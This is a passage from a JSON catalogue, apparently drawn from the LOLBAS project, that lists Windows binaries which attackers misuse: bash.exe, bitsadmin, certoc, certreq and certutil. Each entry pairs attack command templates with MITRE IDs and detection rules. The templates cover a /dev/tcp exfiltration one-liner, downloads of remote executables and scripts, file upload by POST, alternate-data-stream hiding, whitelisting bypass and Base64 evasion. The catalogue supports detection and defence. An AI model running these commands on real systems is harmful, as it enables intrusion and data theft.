installation","aliases":[]},{"id":"lolbas:bash-exe:2","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe -c 'cat {PATH:.zip} > /dev/tcp/192.168.1.10/24'","description":"Exfiltrate data","usecase":"Performs execution of specified file, can be used as a defensive evasion.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:3","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"bash.exe -c \"{CMD}\"","description":"Executes executable from bash.exe","usecase":"Performs execution of specified file, can be used to bypass Application Whitelisting.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bash-exe:4","toolId":"lolbas:bash-exe","toolName":"Bash.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bash.exe","description":"When executed, `bash.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bash.exe","C:\\Windows\\SysWOW64\\bash.exe"],"toolType":"Binary","detection":[{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml"},{"type":"IOC","value":"Child process from bash.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/Binaries/Bash/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:0","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.","usecase":"Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:1","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\\data\\playfolder\\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1","description":"Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:2","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset","description":"Command for copying cmd.exe to another folder","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:bitsadmin-exe:3","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset","description":"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Execute binary file specified. Can be used as a defensive evasion.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certoc-exe:0","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}","description":"Loads the target DLL file","usecase":"Execute code within DLL file","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certoc-exe:1","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certoc.exe -GetCACAPS {REMOTEURL:.ps1}","description":"Downloads text formatted files","usecase":"Download scripts, webshells etc.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certreq-exe:0","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}","description":"Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certreq-exe:1","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}","description":"Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.","usecase":"Upload","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:0","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:1","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>` when not.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:2","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt","description":"Download and save a .ps1 file to an Alternate Data Stream (ADS).","usecase":"Download file from Internet and save it in an NTFS Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:3","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -URL {REMOTEURL:.exe}","description":"Download and save an executable to `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>`.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:4","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Encode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Encode"],"command":"certutil -encode {PATH} {PATH:.base64}","description":"Command to encode a file using Base64","usecase":"Encode files to evade defensive measures","mitre":["T1027.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:5","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decode {PATH:.base64} {PATH}","description":"Command to decode a Base64 encoded file.","usecase":"Decode files to evade defensive 